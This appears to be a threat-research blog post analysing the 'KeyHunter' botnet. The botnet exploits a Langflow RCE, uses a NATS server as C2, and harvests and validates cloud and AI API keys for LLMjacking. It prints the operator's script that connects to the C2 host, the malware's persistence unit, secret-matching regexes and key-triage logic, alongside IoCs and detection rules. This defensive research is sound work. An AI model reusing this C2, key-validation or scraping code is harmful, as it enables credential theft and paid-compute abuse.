
NATS-as-C2: Inside a new technique attackers are using to harvest cloud credentials and AI API keys

Published by: Michael Clark, Director of Threat Research
Published: May 14, 2026

On May 5, 2026, the Sysdig Threat Research Team (TRT) identified a novel command-and-control (C2) technique in which a threat actor used a NATS server as C2 infrastructure. The Sysdig TRT has dubbed this technique “NATS-as-C2.” Rather than relying on traditional HTTP-based panels or chat platforms, the attacker leveraged infrastructure more commonly associated with modern distributed systems. 

The Sysdig TRT traced the activity to an extended exploitation attempt involving CVE-2026-33017, an unauthenticated remote code execution (RCE) vulnerability in Langflow that was added to the CISA KEV catalog on March 25, 2026. Over roughly 30 minutes of hands-on activity, the operator at 159.89.205.184 (DigitalOcean) downloaded a Python worker and a Go binary. During this time, the Sysdig TRT captured the threat actor’s payload, exposing their coordination plane: a NATS server at 45.192.109.25:14222 running an authenticated, ACL-enforced instance. The attacker subsequently attempted to escape the container using DirtyPipe and DirtyCreds exploits.

Threat actors have increasingly adopted legitimate platforms and services as covert communication channels, including Discord, Telegram, GitHub, cloud storage, and AI assistants. Even the more sophisticated credential-stuffing operations published this year, including the exposed Hetzner cluster leaked on April 10, used Flask plus Socket.IO over REST. The use of a native pub/sub message broker with subject-level authorization is a notable evolution beyond either pattern.

Put simply, the Sysdig TRT observed an attacker exploiting a vulnerability, installing malware, and moving laterally to establish deeper system control. What stands out is the attacker’s novel use of NATS, a messaging server normally meant for fast application communication, as their hidden C2 system. This operation gave the threat actor a more advanced, organized means through which to manage infected machines. 

The NATS-as-C2 tool chain

The operator named the project KeyHunter, likely after the original tool designed to discover API key leaks. The initial worker download confirmed the C2 endpoint and message bus identity:

=== KeyHunter Python Worker ===
Worker ID: py-XXXXXX
NATS: nats://45.192.109.25:14222
Capabilities: ['scan_cde', 'scan_web', 'validate_aws', 'validate_ai']
[REGEX] Loaded 12 patterns

The four declared capabilities are also the worker's NATS subscribe subjects — task.scan_cde, task.scan_web, task.validate_aws, and task.validate_ai — all of which were captured from the Python source. Each is a discrete monetization path:

  • scan_cde targets Cloud Development Environment platforms (CodePen, JSFiddle, StackBlitz, CodeSandbox), with a GenericClient fallback for any URL the queue dispatches. This is shared-snippet credential harvesting, an uncommon targeting choice.
  • scan_web scrapes an arbitrary URL.
  • validate_aws confirms harvested AWS access keys are live by calling sts:GetCallerIdentity via boto3 and recording the returned Account, Arn, and UserId for the operator.
  • validate_ai validates harvested LLM provider keys directly against vendor APIs. The open-source fadidevv/keyhunter project covers a similar provider set, and the operator may have copied the brand.

A single worker is positioned to harvest both cloud credentials and AI API keys from the same scan output, and to confirm whether each is live before reporting back. This creates two independent revenue streams from one captured-key pipeline.
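The capability-to-subject mapping described above can be sketched in plain Python. The handler dispatch and payload shape below are illustrative assumptions, not recovered worker source; only the four subject names come from the capture:

```python
import json

# The four subscribe subjects captured from the Python worker, keyed by the
# capability each one advertises. Payload shape ({"target": ...}) is assumed.
CAPABILITIES = {
    "scan_cde": "task.scan_cde",
    "scan_web": "task.scan_web",
    "validate_aws": "task.validate_aws",
    "validate_ai": "task.validate_ai",
}

def dispatch(subject: str, payload: bytes) -> str:
    """Route an incoming task message to the capability that owns its subject."""
    task = json.loads(payload)
    for cap, subj in CAPABILITIES.items():
        if subject == subj:
            return f"{cap}:{task.get('target', '')}"
    raise ValueError(f"no handler for subject {subject!r}")
```

In a real worker each entry would become one NATS subscription; the point is that each subject is a discrete work queue feeding a discrete monetization path.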

Running up against an ACL-enforced server

According to logs, the NATS worker started failing immediately on its first publish:

nats: encountered error
nats.errors.Error: nats: permissions violation for publish to "heartbeat.worker"

The operator responded by writing an ad-hoc enumeration script directly into the exploit channel. The captured prefix is below:

import asyncio, nats, json

async def test():
    nc = await nats.connect("nats://45.192.109.25:14222",
                            user="worker",
                            password="Wkr-XXXX",
                            name="test-perm")
    results = []
    for s in [...]:    # candidate subject list, body of script truncated in capture

The output produced by the full script, listing the subjects the worker role was authorized to publish to under name="test-perm":

heartbeat.worker     = OK
worker.hb            = OK
worker.heartbeat     = OK
result.scan          = OK
scan.result          = OK
result               = OK
worker.result        = OK
kh.result            = OK
keyhunter.result     = OK
workers.heartbeat    = OK

A correctly configured NATS server applies subject-level authorization at the wire layer. The worker role can publish results and heartbeats but cannot publish to control subjects, subscribe to other workers, or read the operator's command stream. A captured node cannot pivot into the bus. This is the principle of least privilege applied to a botnet, and it is the principal reason NATS-as-C2 is architecturally interesting.
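The broker-side policy implied by those permission errors could look like the following nats-server configuration sketch. The subject lists are inferred from the enumerated publish results; the exact account layout and password are assumptions:

```
port: 14222

authorization {
  users = [
    {
      # The "worker" role captured in the operator's test script.
      user: "worker"
      password: "(redacted)"
      permissions: {
        # Results and heartbeats only; no control subjects.
        publish: ["heartbeat.worker", "workers.heartbeat", "worker.>",
                  "result", "result.scan", "scan.result",
                  "kh.result", "keyhunter.result"]
        # Pull tasks, nothing else.
        subscribe: ["task.>"]
      }
    }
  ]
}
```

With a policy like this, the broker rejects any out-of-policy publish at the wire layer, which is exactly the "permissions violation" error the worker logged.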

The operator's rewrites (hb.worker instead of heartbeat.worker, then worker.hb) were live debugging against an Access Control List (ACL) they did not, in fact, control. The Go binary failed independently, leaking a Windows build path in its panic output:

fatal error: failed to reserve page summary memory

runtime stack:
runtime.throw({0x92e78b?, 0x20000000?})
        D:/Program Files/Go/src/runtime/panic.go:1094 +0x48

The operator made one final attempt to constrain the Go runtime with GOMEMLIMIT=400MiB, but Go's mheap allocates the page summary before honoring GOMEMLIMIT, so the binary panicked at the same spot. After that attempt, the session ended. The Python worker remained the operational path, and the Go binary was abandoned in this environment.

What the operator was actually doing

The deploy attempt analyzed above was the second half of a longer session. Over the preceding 10 hours, the same operator IP ran a complete credential-harvest-and-replay cycle, and the deploy attempt was intended to add a stable node to their pool after extracting as much as they could from the immediate target.

Timeline

All times are UTC.

  • 04:13: First probes against an LMDeploy (LLM inference service) instance: Swagger root, /v1/models enumeration, SSRF against the multimodal endpoint
  • 04:00 – 09:00: 203 SSRF exploit events against LMDeploy, plus master-key and admin-surface probing on a LiteLLM instance
  • 09:09: First probe against the Langflow target
  • 09:12: Successful unauthenticated RCE via CVE-2026-33017 (/api/v1/build_public_tmp//flow). The attacker payload dumped the process environment, extracting AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY
  • 09:21: First AWS API call with the harvested credentials: sts:GetCallerIdentity, accepted
  • 09:21 – 13:39: AWS API calls across bedrock, sts, s3, ec2, ce, lambda, logs, ecs, sagemaker, sso, and iam
  • 14:03: Return to the Langflow target with the worker-deploy attempt detailed in the previous section

The AWS reconnaissance pattern consisted of:

  • bedrock:InvokeModel attempts. The operator was specifically trying to use the harvested key against AWS Bedrock foundation models to conduct LLMjacking. This is the same monetization pathway as the worker's validate_ai capability, just applied to AWS-native LLM inference rather than OpenAI or Anthropic SaaS keys. Stolen Bedrock access converts directly into compute the operator does not pay for, and the cost per token on premium foundation models (Claude, Llama 3) is significant enough at scale to be worth the burn rate of testing thousands of harvested AWS keys.
  • bedrock:ListInferenceProfiles and bedrock:ListModelInvocationJobs: control-plane discovery, probing which model regions and inference endpoints the IAM role had access to.
  • sts:GetCallerIdentity calls. These confirm the key is live and identify its IAM principal; the worker's validate_aws capability does exactly this.
  • s3:ListBuckets, ec2:DescribeInstances, ce:GetCostAndUsage, lambda:ListFunctions, logs:DescribeLogGroups, ecs:ListClusters, sagemaker:ListEndpoints, sso:ListInstances, and iam:ListAttachedUserPolicies calls. This is a standard scoped-key reconnaissance sweep, enumerating every common AWS service surface in a few seconds.

The pattern above is exactly what an automated validate_aws worker does at scale: confirm liveness, enumerate the IAM principal's reach, then route the key to the highest-value service it has access to.
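That triage sequence (confirm liveness, enumerate reach, route to the highest-value surface) can be expressed as pure routing logic. The priority ordering and route names below are illustrative assumptions, not recovered from the worker:

```python
# Map IAM actions observed in the recon sweep to the monetization surface
# they unlock, ordered roughly by value to a key-harvesting operator
# (the ordering itself is an assumption).
PRIORITY = [
    ("bedrock:InvokeModel", "llmjacking"),
    ("sagemaker:ListEndpoints", "ml-compute"),
    ("s3:ListBuckets", "data-theft"),
    ("ec2:DescribeInstances", "compute-abuse"),
]

def route_key(allowed_actions: set) -> str:
    """Return the highest-value route a validated key can be sent down."""
    for action, route in PRIORITY:
        if action in allowed_actions:
            return route
    # No directly monetizable surface: fall back to reselling the key.
    return "resell"
```

For example, a key that passed sts:GetCallerIdentity and can call bedrock:InvokeModel would be routed straight to the LLMjacking path.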

Static triage of the worker binary

The operator's staging server was still serving four files from 159.89.205.184:8888 after the session ended: worker-linux-amd64 (9.4 MB Go binary), keyhunter_worker.py (Python fallback), deploy.sh (production installer), and worker.yaml (config). 

The Go binary is statically linked, stripped, CGO-disabled, and includes a module path to github.com/keyhunter/worker (devel). It also has source paths in the symbol table which leak the operator's Windows project layout: 

  • D:/Program Files/Go/... for module cache.
  • /AyuGram Desktop/KeyHunter-Distributed/worker/... for the working tree. (AyuGram Desktop is a custom Telegram desktop client.) 

The decompiled package layout reveals rich tooling detail, including that the worker targets online code-sandbox platforms, not GitHub. It ships dedicated scrapers for four platforms, each with multiple fallback extraction strategies:

  • CodePen: extractViaInitData, extractViaNextData, extractViaPenVar, extractViaTextarea
  • JSFiddle: extractViaEditorConfig, extractViaPanel, extractViaTextarea
  • StackBlitz: downloadViaAPI, downloadViaPage
  • CodeSandbox: downloadDirect, downloadViaSidecar

GitHub is the obvious target for these credential hunters and the focus of every published OSS tool in this space. Online code sandboxes are a quieter and arguably richer corpus: developers paste API keys to test snippets, share the snippet for help, and never delete them. The number of per-platform fallbacks reflects real engineering effort. Each platform has been reverse-engineered for at least two different extraction paths, so a frontend change does not break the worker.

uTLS browser-fingerprint mimicry

The binary imports github.com/refraction-networking/utls v1.8.2. uTLS exposes parroted ClientHello fingerprints for browsers such as Chrome, Firefox, and Safari (including iOS and Android variants), defeating server-side TLS fingerprinting (JA3, JA4) used by Cloudflare, Akamai, and the bot-detection layers in front of CodeSandbox and StackBlitz. Combined with the multi-strategy extraction logic, this is a credential scraper engineered to evade the bot defenses of the platforms it targets.

Headless-browser sidecar

The Go package contains a SidecarProcess to scrape rendered webpages. CodeSandbox uses downloadViaSidecar as a fallback when the direct API path fails. The most likely purpose is a child subprocess (typically a headless browser) that renders JavaScript-heavy pages, with the buffered connection proxying HTTP between the subprocess and the worker. A pure HTTP scraper does not need this code path.
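The sidecar pattern inferred from the binary can be illustrated with a trivial parent/child pipe in Python. The real sidecar is presumably a headless browser; here it is simulated with a stand-in child process, so everything except the pattern itself is an assumption:

```python
import subprocess
import sys

# Stand-in for a headless-browser sidecar: a child process that reads a URL
# on stdin and returns "rendered" content on stdout. A real sidecar would
# drive a browser and return post-JavaScript HTML.
CHILD = (
    "import sys\n"
    "url = sys.stdin.readline().strip()\n"
    "print('rendered:' + url)\n"
)

def fetch_via_sidecar(url: str) -> str:
    """Proxy a fetch through a child subprocess, as a fallback scrape path."""
    proc = subprocess.run(
        [sys.executable, "-c", CHILD],
        input=url + "\n",
        capture_output=True,
        text=True,
        timeout=10,
    )
    return proc.stdout.strip()
```

The parent buffers the child's stdout, which matches the buffered-connection proxying described above: the worker never talks to the target site directly on this path.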

JetStream pull consumers

The NATS client uses PullSubscribe with AckExplicit, which is the JetStream durable-consumer pattern. Tasks are queued centrally, workers pull and explicitly ack, and a dropped worker returns its in-flight tasks to the queue for redelivery. This matches the architectural argument earlier in this writeup: NATS-as-C2 gives operators durability and at-least-once delivery without bespoke client code. The WorkerStats struct exposes IncrActive, DecrActive, SetTaskProgress, and Snapshot, indicating per-task progress reporting back to the operator console.

Key detection engine

One credential-capture path is Python-based and embeds a 12-pattern regex set covering AWS, GitHub, OpenAI, Anthropic, Google, Slack, Stripe, private keys, JWTs, and DB URLs (full list in the appendix). It also attempts to invoke gitleaks v8.24.3, if the binary is on disk, for more comprehensive coverage and to catch credentials the regex set may have missed.
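A pattern set in this style can be sketched as follows. These regexes are representative approximations of common public detection rules, not the worker's actual 12 captured patterns:

```python
import re

# Representative secret patterns (approximations, not the captured set).
PATTERNS = {
    "aws_access_key": re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "openai_key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}\b"),
    "slack_token": re.compile(r"\bxox[baprs]-[A-Za-z0-9-]{10,}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
}

def scan(text: str) -> list:
    """Return (pattern_name, matched_string) pairs found in a blob of text."""
    hits = []
    for name, pat in PATTERNS.items():
        for m in pat.finditer(text):
            hits.append((name, m.group(0)))
    return hits

# AWS's documented example key, safe to use for testing.
print(scan("aws_key = 'AKIAIOSFODNN7EXAMPLE'"))
```

Scanning a scraped snippet for every pattern and reporting each hit with its pattern name is exactly the shape of output a validate_* task needs downstream.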

The Go binary integrates gitleaks correctly, using visible string constants for parse error messages and report path templates, so production-host workers retain the full ~150-rule gitleaks coverage.

Persistence

deploy.sh is used as an install script. It assumes root, runs apt-get / yum / apk to install dependencies, fetches gitleaks from GitHub releases, installs to /opt/keyhunter-worker/, and writes a keyhunter-worker.service systemd unit. The systemd unit installed by deploy.sh reads:

[Service]
Type=simple
WorkingDirectory=/opt/keyhunter-worker
ExecStart=/opt/keyhunter-worker/keyhunter-worker
Restart=always
RestartSec=5
LimitNOFILE=65535

Restart=always plus WantedBy=multi-user.target means worker nodes survive reboots, kernel upgrades, and crashes; they are long-lived infrastructure rather than single-use stagers. LimitNOFILE=65535 raises the per-process file-descriptor cap to 65k, sized for many concurrent outbound connections. (The Go binary's per-worker concurrency is 10 in worker.yaml, but each scrape can open multiple sockets, including the headless-browser sidecar.)

OPSEC

Equally telling is what the script does not do. There is no unset HISTFILE, no journald disable, no /tmp scrub, no in-memory-only install path, no log rotation that drops audit traces, and no attempt to hide the systemd unit under a less obvious name. Worker hosts are not forensically hardened. 

The reasonable inference is that they are virtual private server (VPS) instances that the operator either rents under disposable identities or treats as fully expendable; the cost of forensic uplift is lower than the cost of building hardened tradecraft, so this threat actor skipped the hardening entirely. This pattern is consistent with small operations that scale by adding cheap nodes rather than by raising the per-node bar.

The deploy script also branches on x86_64 and aarch64, implying both architectures are part of the worker pool. ARM nodes are cheaper at scale and dominant in newer Graviton-class cloud instances, so the operator is presumably distributed across cloud providers and instance types to keep the cost per validated AWS key low.

Indicators of compromise

  • 45.192.109.25:14222 (NATS C2)
  • 159.89.205.184:8888 (Staging HTTP)

File hashes

  • worker-linux-amd64 (9,453,752 bytes), SHA-256: dbee863ad2a39f939be2c7ed76f7d5a8fe000aad2d2b2d32b3e8ec3ee42f1c25
  • keyhunter_worker.py (10,979 bytes), SHA-256: 323bbf3064d4b83df7920d752636b1acb36f462e58609a815bd8084d1e6b004c
  • deploy.sh (1,424 bytes), SHA-256: 16b279aa018c64294d58280636e538f86e3dd9bdcb5734c203373394b72d101a

Why this matters

NATS servers provide three properties that scanner-pool operators historically had to engineer themselves:

  • Wire-level authorization: Per-subject ACLs are enforced by the broker, not by client-side checks that a captured node can disable.
  • One-to-many fan-out: A single publish to result.scan reaches every aggregator without the worker enumerating peers, which improves OPSEC and simplifies horizontal scaling.
  • First-class auth and durability: Username/password, TLS, and nkey auth are native, and JetStream provides durable queues so a worker can drop offline without losing its work.

The technical bar to operate NATS-as-C2 infrastructure is meaningfully higher than running a Flask panel. The operator at 159.89.205.184 is closer to running a small SaaS than to the commodity kits typically seen in credential-harvesting botnets.

Enumerated NATS publish subjects under the worker ACL: heartbeat.worker, worker.hb, worker.heartbeat, result.scan, scan.result, result, worker.result, kh.result, keyhunter.result, workers.heartbeat.

Detection

Sysdig Secure and OSS Falco rules can detect NATS-as-C2 malware. As noted above, this malware takes no additional defense-evasion steps; instead, it relies on mechanisms common in legitimate network traffic, which helps it blend in.

Rules that NATS-as-C2 will trigger include:

  • Suspicious System Service Modification
  • Outbound Connection to C2 Servers
  • Sysdig AWS Runtime Analytics 
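A custom rule keyed to the observed infrastructure can complement the managed rules above. The following is a sketch in Falco rule syntax using the IoC values from this report; the rule name and tags are our own:

```yaml
- rule: Outbound Connection to KeyHunter NATS C2
  desc: Detects an outbound connection to the NATS broker used as C2 in this campaign
  condition: >
    evt.type = connect and evt.dir = < and
    fd.sip = "45.192.109.25" and fd.sport = 14222
  output: >
    Outbound connection to KeyHunter NATS C2
    (command=%proc.cmdline connection=%fd.name user=%user.name)
  priority: CRITICAL
  tags: [network, c2, keyhunter]
```

Because the worker speaks plain NATS on a fixed broker address, a simple destination-based rule like this is effective until the operator rotates infrastructure.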

Recommendations

  • Update Langflow to a version that patches CVE-2026-33017. The vulnerable endpoint is unauthenticated, which makes mass scanning trivial.
  • Block outbound traffic to 45.192.109.25:14222 and 159.89.205.184:8888 at the network perimeter.
  • Egress allowlist workloads running AI tooling. Langflow, n8n, and similar visual-flow platforms typically need outbound access only to specific LLM and database endpoints; broad outbound is unnecessary and provides exactly the channel a deployed worker needs to reach a NATS broker.
  • Rotate any AWS, OpenAI, Anthropic, or HuggingFace credentials that were reachable from a Langflow instance exposed prior to patching. The captured worker validates these in real time.

Conclusion

The KeyHunter operator that the Sysdig TRT discovered is using NATS for the same reasons engineering teams adopt it: subject-scoped authorization, native fan-out, and durable queues. None of those properties is unique to legitimate workloads, and applying them to a credential-hunting worker pool produces a botnet that is more reliable and scalable than the typical HTTP-panel architecture.

The literal error strings the operator leaked through their RCE channel are a useful detection seed, but the broader takeaway is that NATS-as-C2 is a novel pattern that defenders should expect to see more of. As a result, outbound-egress posture matters more than ever.
